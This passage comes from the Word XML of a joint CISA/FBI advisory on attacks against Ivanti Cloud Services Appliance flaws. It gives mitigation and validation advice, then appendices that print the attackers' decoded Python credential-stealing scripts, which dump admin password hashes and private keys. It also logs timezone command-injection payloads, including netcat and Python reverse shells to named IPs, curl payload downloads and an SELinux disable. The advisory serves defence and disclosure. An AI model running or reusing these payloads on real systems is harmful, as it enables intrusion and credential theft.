      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Strictly limit the use of remote desktop protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]: Audit the network for systems using RDP.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Close unused RDP ports.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce account lockouts after a specified number of attempts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Apply phishing-resistant multifactor authentication (MFA).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Log RDP login attempts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Follow best cybersecurity practices in your production and enterprise environments,including mandating phishing-resistant multifactor authentication (MFA) for all staff and services. For additional best practices, see CISA's Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures. Because the CPGs are a subset of best practices, CISA and FBI also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF). Validate Security Controls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In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>advisory. CISA and FBI recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (see Table 4 through Table 13).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process.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CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. References Ivanti: Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024- 9379, CVE-2024-9380, CVE-2024-9381) Ivanti: Security Advisory Ivanti Cloud Service Appliance (CSA) (CVE-2024- 8190) Ivanti: Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE- 2024-8963) Fortinet: Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA Contact Information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Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to: CISA via CISA's 24/7 Operations Center (report@cisa.gov or 888-282-0870) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. Disclaimer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information in this report is being provided "as is" for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI. Version History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January 22, 2025: Initial version. Appendix A: Encoded and Decoded Scripts Decoded Python Scripts { import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin'\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') } { import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='service'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'service'\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') } import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP')</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import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}',lockoutalert=0,attempts=0 where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))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open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]</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 = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip() v = p.split(':') k = os.popen('base 64 -w0 root/.certs/{}.key'.format(v[1])).read() set_msg(dbpwd, "PASSWORD", p+'||'+k) time.sleep(30) set_msg(dbpwd) }</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import os, re, base64, time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def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}',lockoutalert=0 where username='admin'"|psql -d brokerdb - U gsbadmin'''.format(p, msg))</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os.chdir("/tmp") d = "/backups" try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0] os.system('''export PGPASSWORD={};echo "delete from user_info where runas='Nobody'"|psql -d brokerdb -U gsbadmin'''.format(dbpwd)) if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} '{}' '{}' '{}' root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') } { import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0] os.system('''export PGPASSWORD={};echo "delete from user_info where runas='Nobody'"|psql -d brokerdb -U gsbadmin'''.format(dbpwd)) if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') } Decoded datetime.php 'timezone' Exploit base64 Scripts { Sep 5 01:09:59 REDACTED gsb[996]: /etc/php.ini rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo "update user_info set organization='||/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb - U gsbadmin;' (1) } { Sep 5 01:47:01 REDACTED gsb[2599]: /etc/php.ini rewritten with new timezone: ';/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python;' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(1) } { Sep 5 02:14:08 REDACTED gsb[1273]: /etc/php.ini rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo "update user_info set organization='||/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb - U gsbadmin;' (1) } { Sep 5 22:22:06 REDACTED gsb[9367]: /etc/php.ini rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo "update user_info set organization='||/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb - U gsbadmin;' (1) } { Sep 6 02:39:11 REDACTED gsb[21266]: /etc/php.ini rewritten with new timezone: ';/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python;' (1) } { Sep 6 03:03:44 REDACTED gsb[11427]: /etc/php.ini rewritten with new timezone: ';bash /tmp/Xa27efd2.tmp;' (1) } { Sep 8 05:18:35 REDACTED gsb[5132]: /etc/php.ini rewritten with new timezone: ';/sbin/backuptool --backup;' (1) } { Sep 8 05:19:34 REDACTED gsb[5325]: /etc/php.ini rewritten with new timezone: ';/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python;' (1) } { Sep 8 10:37:35 REDACTED gsb[6196]: /etc/php.ini rewritten with new timezone: ';nc REDACTED 80 -ssl -e /bin/bash;' (1) } { Sep 8 10:40:38 REDACTED gsb[8758]: /etc/php.ini rewritten with new timezone: ';curl https://gggg.oyr2ohrm.eyes.sh /;' (1) } { Sep 8 10:41:35 REDACTED gsb[7475]: /etc/php.ini rewritten with new timezone: ';curl 98.98.54.209/a.sh -o /dev/shm/a.sh ;' (1) } { Sep 8 13:10:37 REDACTED gsb[22555]: /etc/php.ini rewritten with new timezone: ';nc REDACTED 80 --ssl -e /bin/bash;' (1) } { Sep 8 13:21:06 REDACTED gsb[24954]: /etc/php.ini rewritten with new timezone: ';nc REDACTED 80 --ssl -e /bin/bash;' (1) } { Sep 8 20:23:14 REDACTED gsb[1899]: /etc/php.ini rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo "update user_info set organization='||/usr/bin/echo import os, re, base64, time os.chdir("/tmp") d = "/backups" def set_msg(p, t='', m=''): if t and m: msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode()) else: msg = '' os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg)) try: r = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime) except: r = None with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if r: p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':') os.system("tar zxvf {}".format(r)) while True: for f in os.listdir('.'): if re.match("php\w{6}", f): os.chmod(f, 0o777) m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip() if m: set_msg(dbpwd, "PASSWORD", m) time.sleep(30) set_msg(dbpwd) exit() else: set_msg(dbpwd, 'ERROR', 'NO BACKUP') | /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb - U gsbadmin;' (1) } { Sep 10 04:36:30 REDACTED gsb[16012]: /etc/php.ini rewritten with new timezone: ';/usr/bin/echo python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("45.33.101.53</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",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'== | /usr/bin/base64 -d | /bin/bash;' (1) } { Sep 10 11:48:32 csa gsb[6829]: /etc/php.ini rewritten with new timezone: ';/bin/ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("156.234.193.18",44345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);';' (1) } { Sep 10 05:33:42 REDACTED gsb[17292]: /etc/php.ini rewritten with new timezone: ';/usr/bin/echo import os, re, time os.chdir("/tmp") d = "/backups/backup-09-01-2024_010101.tar.gz" with open("/opt/landesk/broker/broker.conf") as f: dbpwd = re.findall("PGSQL_PW=(.*)", f.read ())[0] if os.path.exists(d): os.system("tar zxf {}".format(d)) pwd = os.popen("export PGPASSWORD={};echo SELECT username,passwd FROM user_info | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().strip() p = pwd.split(':') k = os.popen("cat root/.certs/{}.0".format(p[1])).read().strip() os.system('''export PGPASSWORD={};echo "INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (1, '{}', '1', '{}', '2024-03-13 05:10:16.926012')"|psql -d brokerdb -U gsbadmin'''.format(dbpwd, k[0:200], k[200:700])) os.system('''export PGPASSWORD={};echo "INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (2, '{}', '2', '{}', '2024-03-13 05:10:16.926012')"|psql -d brokerdb -U gsbadmin'''.format(dbpwd, k[700:900], k[900:])) os.system('''export PGPASSWORD={};echo "INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (3, '{}', '3', '{}', '2024-03-13 05:10:16.926012')"|psql -d brokerdb -U gsbadmin'''.format(dbpwd, pwd[0:200], pwd[200:700])) time.sleep(60) os.system('''export PGPASSWORD={};echo "DELETE FROM blockedcerts"|psql -d brokerdb -U gsbadmin'''.format(dbpwd)) os.system("rm -rdf *;rm -rf *")== | /usr/bin/base64 -d | python;' (1) } Appendix B: Sudo Commands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See Table 14 for a list of known sudo commands executed by the threat actors.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Command Use sudo: nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/opt/landesk/ldms/LDClient/ldpclient -i ;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo "update user_info set organization='||/usr/bin/echo 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 | /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb - U gsbadmin;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Updates the "organization" field of the "admin" account in the PGSQL database with python script decoded from base64.</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python script decompresses the latest backup of the PGSQL database and extracts the password for the gsbadmin account to access the database. nobody : user NOT in sudoers ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=/sbin/setenforce 0 Temporarily disables SELinux.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
